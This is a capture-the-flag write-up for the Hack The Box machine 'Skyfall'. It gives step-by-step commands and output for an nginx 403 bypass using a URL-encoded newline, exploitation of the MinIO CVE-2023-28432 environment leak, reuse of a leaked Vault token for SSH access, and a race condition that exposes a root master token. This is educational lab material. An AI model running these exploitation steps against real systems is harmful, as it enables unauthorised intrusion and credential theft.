HTB Skyfall writeup [50 pts]
Skyfall is a linux insane machine that teaches things about cloud and secrets management using third parties software. It starts with a web that lets me upload files that has a “Metrics” page forbidden. This path its managed with nginx and because its bad configured, I can bypass the forbidden injecting a \n url-encoded. In this page, there are MinIO metrics that leaks a subdomain used for a MinIO instance, whose version is vulnerable to information leakage that leaks the secrets used to connect to this instance. When I have the secrets, I can read files of another users and there are 3 versions of a home backup corresponding to askyy, of which the version 2 has a VAULT_TOKEN and VAULT_API_ADDR leaked in .bashrc. After that, I can use this vault variable to connect to vault, list ssh roles and connect with ssh as askyy to skyfall without askyy’s password but with the vault token. Then, to escalate to root, I will abuse a sudo privilege where I can execute vault-unseal that writes the vault key in a debug.log owned by root. This file is deleted each time is created so I can make a race condition to create it first so its owned by me and create a symlink to view its contents. Finally, I can use vault ssh with the new token to have access as root.
Port recognaissance
I will start with a basic TCP port scanning with nmap to see which ports are open and see which services are running:
❯ sudo nmap -p- --open -sS -sVC --min-rate 5000 -v -n -Pn
# Nmap 7.94SVN scan initiated Sun Apr 21 12:52:51 2024 as: nmap -sVC -p- --open -sS --min-rate 5000 -v -n -Pn -oN tcpTargeted
Nmap scan report for
Host is up (0.096s latency).
Not shown: 65532 closed tcp ports (reset), 1 filtered tcp port (no-response)
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
22/tcp open ssh OpenSSH 8.9p1 Ubuntu 3ubuntu0.6 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 256 65:70:f7:12:47:07:3a:88:8e:27:e9:cb:44:5d:10:fb (ECDSA)
|_ 256 74:48:33:07:b7:88:9d:32:0e:3b:ec:16:aa:b4:c8:fe (ED25519)
80/tcp open http nginx 1.18.0 (Ubuntu)
|_http-title: Skyfall - Introducing Sky Storage!
|_http-favicon: Unknown favicon MD5: FED84E16B6CCFE88EE7FFAAE5DFEFD34
|_http-server-header: nginx/1.18.0 (Ubuntu)
| http-methods:
|_ Supported Methods: GET HEAD
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at .
# Nmap done at Sun Apr 21 12:53:16 2024 -- 1 IP address (1 host up) scanned in 25.27 seconds
- -sVC: Identifies service and version.
- -p-: scans all the range of ports (1-65535).
- –open: shows only open ports and not filtered or closed.
- -sS: TCP SYN scan that improves velocity because it doesn’t establish the connection.
- –min-rate 5000: Sends 5000 packets per second to improve velocity (don’t do this in a real environment).
- -n: Disables DNS resolution protocol.
- -v: Enables verbose to see which ports are opened while it’s scanning
- -Pn: Disables host discovery protocol (ping).
- -oN targeted: Exports the evidence to a file named “tcpTargeted”.
Web enumeration
Taking a look with curl, I can see its using nginx and its about a Sky Storage solution:
❯ curl -i -s | less
In the browser, I can see this landing page:
The only interesting thing here is this link that goes to demo.skyfall.htb:
So I will add this line to the /etc/hosts: skyfall.htb demo.skyfall.htb
Going to this link brings me to this login page:
It gives me credentials to try the demo (guest / guest), so I will introduce them and I gain access to the panel:
There are some issues and they are talking about Minio Storage. Searching in google, I can see that its about a open source object storage compatible with amazon s3, kubernetes, etc:
I didn’t found a minio server still so I will ignore this by now and I will look more the web. Also in the bottom, I can see its made with Flask. There are some functionalities here, which are “Files”, “Beta Features”, “URL Fetch”, “MinIO Metrics”, “Feedback” and “Escalate”.
The files link has a utility to upload files and view the ones uploaded. It has a welcome.pdf by default:
Downloading it just shows a welcome pdf with no important information:
I can also upload some files and download them. For example, I will upload a testing.txt and see its functionalities:
It has download, delete and rename functionalities. I will ignore them by now.
I can also try to upload something with path traversal like ‘../../../../../../../../proc/self/cwd/’ but its renamed to a secure filename:
The “Beta Features” page is forbidden for me (probably because I’m guest user):
The “URL Fetch” option is for downloading file from an URL, and if I put my http server, it makes a request and downloads it into a file:
Obviously, its also stored in the server and I can view it in the “Files” page and do the same actions with it:
The “MinIO metrics” page gives another “403 forbidden” but its different from the one of before. It’s a 403 from nginx and the other was probably programmed in flask:
A nice tool to try to bypass 403 using a lot of techniques is nomore403, so I will clone it and execute it against the metrics URL:
❯ git clone
Cloning into 'nomore403'...
remote: Enumerating objects: 478, done.
remote: Counting objects: 100% (167/167), done.
remote: Compressing objects: 100% (95/95), done.
remote: Total 478 (delta 74), reused 124 (delta 67), pack-reused 311 (from 1)
Receiving objects: 100% (478/478), 172.53 KiB | 1.14 MiB/s, done.
Resolving deltas: 100% (250/250), done.
❯ cd nomore403
❯ ls
cmd payloads go.mod go.sum LICENSE main.go
❯ go build .
❯ ls
LICENSE cmd go.mod go.sum main.go nomore403 payloads
❯ chmod +x nomore403
❯ ./nomore403 -H "Cookie: session=.eJwljklqBEEMBP9SZx9qVUvzmUZLChuDDd0zJ-O_u8DHyCAhfsqZF-738nheL7yV8yPKo3RuIwcEA-azNzFWA3E1gFcGbeMsVCPEgeiVlT0Rrap1tiTm2YTmWuI0Vk5bM4iO4K4cHZD9bOPwrjIoaq-eqpXhYQ1ZdsjrxvVf0zb6feX5_P7E1x5SJTUN6UZtEC_j6tA44pBVD5mVFD1G-f0D3jZBtg.ZsJoXQ.3_gAJxuz_FOEOl4xmMJ5j4qf4tA" -u http://demo.skyfall.htb/metrics | grep -v 403
Target: http://demo.skyfall.htb/metrics
Headers: {Cookie session=.eJwljklqBEEMBP9SZx9qVUvzmUZLChuDDd0zJ-O_u8DHyCAhfsqZF-738nheL7yV8yPKo3RuIwcEA-azNzFWA3E1gFcGbeMsVCPEgeiVlT0Rrap1tiTm2YTmWuI0Vk5bM4iO4K4cHZD9bOPwrjIoaq-eqpXhYQ1ZdsjrxvVf0zb6feX5_P7E1x5SJTUN6UZtEC_j6tA44pBVD5mVFD1G-f0D3jZBtg.ZsJoXQ.3_gAJxuz_FOEOl4xmMJ5j4qf4tA}
Proxy: false
Method: GET
Payloads folder: payloads
Custom bypass IP: false
Follow Redirects: false
Rate Limit detection: false
Timeout (ms): 6000
Delay (ms): 0
Techniques: verbs, verbs-case, headers, endpaths, midpaths, http-versions, path-case
Unique: false
Verbose: false
━━━━━━━━━━━━━━━ VERB TAMPERING ━━━━━━━━━━━━━━━
405 327 bytes TRACE
━━━━━━━━━━━━━━━━━━ HEADERS ━━━━━━━━━━━━━━━━━━━
━━━━━━━━━━━━━━━ CUSTOM PATHS ━━━━━━━━━━━━━━━━━
500 854 bytes http://demo.skyfall.htb/metrics.html
200 45335 bytes http://demo.skyfall.htb/metrics%0A
302 428 bytes http://demo.skyfall.htb/#?metrics
302 428 bytes http://demo.skyfall.htb/#metrics
302 428 bytes http://demo.skyfall.htb///?anythingmetrics
302 428 bytes http://demo.skyfall.htb/?metrics
302 428 bytes http://demo.skyfall.htb/???metrics
302 428 bytes http://demo.skyfall.htb/??metrics
━━━━━━━━━━━━━━━ HTTP VERSIONS ━━━━━━━━━━━━━━━━
━━━━━━━━━━━━ PATH CASE SWITCHING ━━━━━━━━━━━━━
It shows a 200 status code using metrics%0A
, %0A decoded is a line break. This happens probably because this path is configured to be forbidden with nginx, which see that the url does not match with /metrics
and doesn’t do anything to block it. Then, the flask server checks this url and as werkzeug uses the strip function, it results in the /metrics page. Trying it gives us the MinIO metrics page!:
For more information on how this bypass works check this page
Here its leaked the minio endpoint subdomain at the bottom:
Also, the version its leaked:
After adding it to the /etc/hosts, making a curl against it returns an expected access denied error:
❯ curl -i -sS http://prd23-s3-backend.skyfall.htb/
HTTP/1.1 403 Forbidden
Server: nginx/1.18.0 (Ubuntu)
Date: Sun, 18 Aug 2024 22:16:53 GMT
Content-Type: application/xml
Content-Length: 254
Connection: keep-alive
Accept-Ranges: bytes
Content-Security-Policy: block-all-mixed-content
Strict-Transport-Security: max-age=31536000; includeSubDomains
Vary: Origin
Vary: Accept-Encoding
X-Amz-Id-2: e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
X-Amz-Request-Id: 17ECF285AAB4E0B3
X-Content-Type-Options: nosniff
X-Xss-Protection: 1; mode=block
<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>AccessDenied</Code><Message>Access Denied.</Message><Resource>/</Resource><RequestId>17ECF285AAB4E0B3</RequestId><HostId>e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855</HostId></Error>
The documentation of MinIO is available here and I can see that the tool to interact with a MinIO server is mc
(minio client) so first I will install it like specified in the docs:
❯ curl --create-dirs -o $HOME/minio-binaries/mc
% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed
100 25.9M 100 25.9M 0 0 1720k 0 0:00:15 0:00:15 --:--:-- 1336k
❯ chmod +x $HOME/minio-binaries/mc
Now I have it in a folder called minio-binaries in my user’s home directory. The documentation also gives instructions on how to create an alias for a MinIO server for later interacting with it. However, I need the access key and secret key, which I don’t have:
Here is an example of how to deploy minio and I could try that credentials specified but it won’t be so easy:
❯ /home/gabri/minio-binaries/mc alias set skyfall-minio http://prd23-s3-backend.skyfall.htb myminioadmin minio-secret-key-change-me
mc: <ERROR> Unable to initialize new alias from the provided credentials. The Access Key Id you provided does not exist in our records.
Looking for vulnerabilities of minio 2023-03-13T19:46:17Z (version that I saw in the MinIO metrics page), I saw CVE-2023-28432 which is an information disclosure that leaks all the environment variable, including the MINIO_SECRET_KEY and MINIO_ROOT_PASSWORD, which is what I’m searching for:
The MinIO version in this server matches that range between 2019-12-17T23-16-33Z and 2023-03-20T20-16-18Z, so it’s vulnerable.
Now, searching for exploits I saw this one and the only things that does is make a POST request to /minio/bootstrap/v1/verify:
So I will do it manually with curl:
❯ curl -sS -X POST http://prd23-s3-backend.skyfall.htb/minio/bootstrap/v1/verify | jq '.MinioEnv'
"MINIO_ACCESS_KEY_FILE": "access_key",
"MINIO_CONFIG_ENV_FILE": "config.env",
"MINIO_KMS_SECRET_KEY_FILE": "kms_master_key",
"MINIO_ROOT_PASSWORD": "GkpjkmiVmpFuL2d3oRx0",
"MINIO_ROOT_USER_FILE": "access_key",
"MINIO_SECRET_KEY_FILE": "secret_key",
"MINIO_UPDATE": "off",
And I have the MINIO_ROOT_USER and MINIO_ROOT_PASSWORD so I will try to make an alias for this MinIO instance:
❯ /home/gabri/minio-binaries/mc alias set skyfall-minio http://prd23-s3-backend.skyfall.htb 5GrE1B2YGGyZzNHZaIww GkpjkmiVmpFuL2d3oRx0
Added `skyfall-minio` successfully.
It worked! Now I can run operations with it. The operation to see the buckets and files it mc ls, so I will run it:
❯ /home/gabri/minio-binaries/mc ls --recursive --versions skyfall-minio
And I can see the files belonging to each user and also the ones of guest (which are mine). The most intereseting ones are the different versions of home_backup.tar.gz of askyy. I will start with the one that occupies more as it probably has more data. I will download it using mc cp and the –version-id parameter:
❯ /home/gabri/minio-binaries/mc cp skyfall-minio/askyy/home_backup.tar.gz home_backup.tar.gz --vid '3c498578-8dfe-43b7-b679-32a3fe42018f'
Decompressing and viewing the contents as expected shows askyy’s home:
❯ mkdir askyy_home_v1
❯ mv home_backup.tar.gz askyy_home_v1
❯ cd askyy_home_v1
❯ tar -xf home_backup.tar.gz
❯ rm home_backup.tar.gz
❯ ls -a
. .. .bash_history .bash_logout .bashrc .cache .profile .ssh .sudo_as_admin_successful .viminfo terraform-generator
The .ssh directory has an id_rsa but it doesn’t work for askyy user:
❯ /bin/ls -a .ssh
. .. authorized_keys id_rsa
❯ ssh -i .ssh/id_rsa askyy@skyfall.htb
The authenticity of host 'skyfall.htb (' can't be established.
ED25519 key fingerprint is SHA256:mUK/F6yhenOEZEcLnWWWl3FVk3PiHC8ETKpL3Sz773c.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added 'skyfall.htb' (ED25519) to the list of known hosts.
(askyy@skyfall.htb) Password:
There is nothing more interesting here. I will try version 2 now:
❯ /home/gabri/minio-binaries/mc cp skyfall-minio/askyy/home_backup.tar.gz home_backup_v2.tar.gz --vid '2b75346d-2a47-4203-ab09-3c9f878466b8'
❯ mkdir askyy_home_v2
❯ mv home_backup_v2.tar.gz askyy_home_v2
❯ cd askyy_home_v2
❯ tar -xf home_backup_v2.tar.gz
❯ rm home_backup_v2.tar.gz
Now there isn’t any id_rsa:
❯ /bin/ls -a
. .. .bash_history .bash_logout .bashrc .cache .profile .ssh .sudo_as_admin_successful
❯ /bin/ls -a .ssh
. .. authorized_keys
But in the .bashrc, there are two variable exported called “VAULT_API_ADDR” and “VAULT_TOKEN”, which are very interesting:
❯ bat .bashrc
Note: bat is just a cat with syntax highliting and table format (or not with -p). You can download it from here
There is a new host so I will add it to the /etc/hosts.
Access as askyy
Searching this variables in google makes me think that is using hashicorp vault:
Hashicorp vault is like a secrets management system:
I will install it like specified here:
❯ export GOPATH=$HOME/go
❯ export PATH=$GOPATH/bin:$PATH
❯ mkdir -p $GOPATH/src/ && cd $_
❯ git clone
❯ cd vault
❯ make bootstrap
❯ make dev
Now I can execute vault because its in $GOPATH/bin:
❯ which vault
❯ vault -h
Usage: vault <command> [args]
Common commands:
read Read data and retrieves secrets
write Write data, configuration, and secrets
delete Delete secrets and configuration
list List data or secrets
login Authenticate locally
agent Start a Vault agent
server Start a Vault server
status Print seal and HA status
unwrap Unwrap a wrapped secret
Other commands:
audit Interact with audit devices
auth Interact with auth methods
debug Runs the debug command
kv Interact with Vault's Key-Value storage
lease Interact with leases
monitor Stream log messages from a Vault server
namespace Interact with namespaces
operator Perform operator-specific tasks
patch Patch data, configuration, and secrets
path-help Retrieve API help for paths
pki Interact with Vault's PKI Secrets Engine
plugin Interact with Vault plugins and catalog
policy Interact with policies
print Prints runtime configurations
proxy Start a Vault Proxy
secrets Interact with secrets engines
ssh Initiate an SSH session
token Interact with tokens
transform Interact with Vault's Transform Secrets Engine
transit Interact with Vault's Transit Secrets Engine
version-history Prints the version history of the target Vault server
To use vault, I have to export VAULT_ADDR and VAULT_TOKEN, so I will use the ones of the .bashrc of askyy:
❯ export VAULT_ADDR="http://prd23-vault-internal.skyfall.htb"
❯ export VAULT_TOKEN="hvs.CAESIJlU9JMYEhOPYv4igdhm9PnZDrabYTobQ4Ymnlq1qY-LGh4KHGh2cy43OVRNMnZhakZDRlZGdGVzN09xYkxTQVE"
In the vault command documentation, I saw a ssh command which is interesting. It allows connecting with the target machine using one of the ssh secrets engine enabled. It has two modes, one with CA and one with OTP:
But I need a valid role and to list it I can use the list command against the route specified here:
❯ vault list ssh/roles
And I have two roles, of which dev_otp_key_role works for askyy user:
❯ vault ssh -role dev_otp_key_role -mode otp -strict-host-key-checking no askyy@skyfall.htb
Warning: Permanently added 'skyfall.htb' (ED25519) to the list of known hosts.
Welcome to Ubuntu 22.04.3 LTS (GNU/Linux 5.15.0-101-generic x86_64)
* Documentation:
* Management:
* Support:
This system has been minimized by removing packages and content that are
not required on a system that users do not log into.
To restore this content, you can run the 'unminimize' command.
Failed to connect to Check your Internet connection or proxy settings
Last login: Tue Aug 20 09:46:20 2024 from
Note: the
-strict-host-key-checking no
is for vault ssh to not check the host certificate because vault uses sshpass to automatize the ssh connection and sshpass its not able to authorize an ssh connection. Another solution can be uninstalling sshpass and entering the OTP manually.
The user flag is available in the user’s home:
askyy@skyfall:~$ cat user.txt
Access as root
Looking at the sudo privileges, I can run vault-unseal with some parameters:
askyy@skyfall:~$ sudo -l
Matching Defaults entries for askyy on skyfall:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin, use_pty
User askyy may run the following commands on skyfall:
(ALL : ALL) NOPASSWD: /root/vault/vault-unseal ^-c /etc/vault-unseal.yaml -[vhd]+$
(ALL : ALL) NOPASSWD: /root/vault/vault-unseal -c /etc/vault-unseal.yaml
That executable is from here. Its an utility to unseal vault data using tokens distributed in various instances.
For more information on how hashicorp vault unseals data check this page but its not relevant for the exploitation.
Looking at the help panel, I can see for what are the parameters:
askyy@skyfall:~$ sudo /root/vault/vault-unseal -c /etc/vault-unseal.yaml -h
vault-unseal [OPTIONS]
Application Options:
-v, --verbose enable verbose output
-d, --debug enable debugging output to file (extra logging)
-c, --config=PATH path to configuration file
Help Options:
-h, --help Show this help message
is for verbose output, -c
is to specify the config file and -d
outputs debugging info into a file. I will run it with -v:
askyy@skyfall:~$ sudo /root/vault/vault-unseal -c /etc/vault-unseal.yaml -v
[+] Reading: /etc/vault-unseal.yaml
[-] Security Risk!
[-] Master token found in config: ****************************
[>] Enable 'debug' mode for details
[+] Found Vault node: http://prd23-vault-internal.skyfall.htb
[>] Check interval: 5s
[>] Max checks: 5
[>] Checking seal status
[+] Vault sealed: false
Its saying that the master token was found in config but I don’t have access to read it:
askyy@skyfall:~$ cat /etc/vault-unseal.yaml
cat: /etc/vault-unseal.yaml: Permission denied
The -d
parameter creates a debug.log in the current directory:
askyy@skyfall:/tmp$ ls -a
. .X11-unix systemd-private-2a289f2479f84c67a890f0d7c7d580c6-systemd-logind.service-6IF9X1
.. .XIM-unix systemd-private-2a289f2479f84c67a890f0d7c7d580c6-systemd-resolved.service-g7qYCh
.ICE-unix .font-unix systemd-private-2a289f2479f84c67a890f0d7c7d580c6-systemd-timesyncd.service-DjNSEM
.Test-unix snap-private-tmp vmware-root_522-2965382515
askyy@skyfall:/tmp$ sudo /root/vault/vault-unseal -c /etc/vault-unseal.yaml -d
[>] Checking seal status
[+] Vault sealed: false
askyy@skyfall:/tmp$ ls -a
. .Test-unix .font-unix systemd-private-2a289f2479f84c67a890f0d7c7d580c6-systemd-logind.service-6IF9X1 vmware-root_522-2965382515
.. .X11-unix debug.log systemd-private-2a289f2479f84c67a890f0d7c7d580c6-systemd-resolved.service-g7qYCh
.ICE-unix .XIM-unix snap-private-tmp systemd-private-2a289f2479f84c67a890f0d7c7d580c6-systemd-timesyncd.service-DjNSEM
But I can’t read it because permissions:
askyy@skyfall:/tmp$ ls -l debug.log
-rw------- 1 root root 555 Aug 22 15:40 debug.log
askyy@skyfall:/tmp$ cat debug.log
cat: debug.log: Permission denied
However, if the file is removed before writing it, its possible to make a race condition, where if a file debug.log
its created before vault-unseal writes to it, I will be able to see the contents because it will be owned by me and root will just modify it. For that I need three terminals, one to create the debug.log, other to cat it in a loop and the other to execute the vault-unseal command.
First terminal:
askyy@skyfall:/tmp$ mkdir racecondition
askyy@skyfall:/tmp$ cd racecondition/
askyy@skyfall:/tmp/racecondition$ while true; do touch debug.log 2>/dev/null; rm debug.log; done
Second terminal:
askyy@skyfall:/tmp$ while true; do cat /tmp/racecondition/debug.log 2>/dev/null; done
Third terminal:
askyy@skyfall:/tmp$ cd /tmp/racecondition
askyy@skyfall:/tmp/racecondition$ while true; do (sudo /root/vault/vault-unseal -c /etc/vault-unseal.yaml -vd) &>/dev/null;done
It looks like this:
After running those, in the output of the second terminal, I can see the master token:
2024/08/22 16:36:09 Initializing logger...
2024/08/22 16:36:09 Reading: /etc/vault-unseal.yaml
2024/08/22 16:36:09 Security Risk!
2024/08/22 16:36:09 Master token found in config: hvs.I0ewVsmaKU1SwVZAKR3T0mmG
2024/08/22 16:36:09 Found Vault node: http://prd23-vault-internal.skyfall.htb
2024/08/22 16:36:09 Check interval: 5s
2024/08/22 16:36:09 Max checks: 5
2024/08/22 16:36:09 Establishing connection to Vault...
2024/08/22 16:36:09 Successfully connected to Vault: http://prd23-vault-internal.skyfall.htb
2024/08/22 16:36:09 Checking seal status
2024/08/22 16:36:09 Vault sealed: false
So I will export it in my machine and connect as root:
❯ export VAULT_ADDR="http://prd23-vault-internal.skyfall.htb"
❯ export VAULT_TOKEN="hvs.I0ewVsmaKU1SwVZAKR3T0mmG"
❯ vault list ssh/roles
❯ vault ssh -role dev_otp_key_role -mode otp -strict-host-key-checking no root@skyfall.htb
failed to generate credential: failed to get credentials: Error making API request.
URL: PUT http://prd23-vault-internal.skyfall.htb/v1/ssh/creds/dev_otp_key_role
Code: 400. Errors:
* Username is not present is allowed users list
That role doesn’t work, so I will use the other one (and it makes sense as root is an admin) and it works:
❯ vault ssh -role admin_otp_key_role -mode otp -strict-host-key-checking no root@skyfall.htb
Welcome to Ubuntu 22.04.3 LTS (GNU/Linux 5.15.0-101-generic x86_64)
* Documentation:
* Management:
* Support:
This system has been minimized by removing packages and content that are
not required on a system that users do not log into.
To restore this content, you can run the 'unminimize' command.
Failed to connect to Check your Internet connection or proxy settings
Last login: Thu Aug 22 11:07:34 2024 from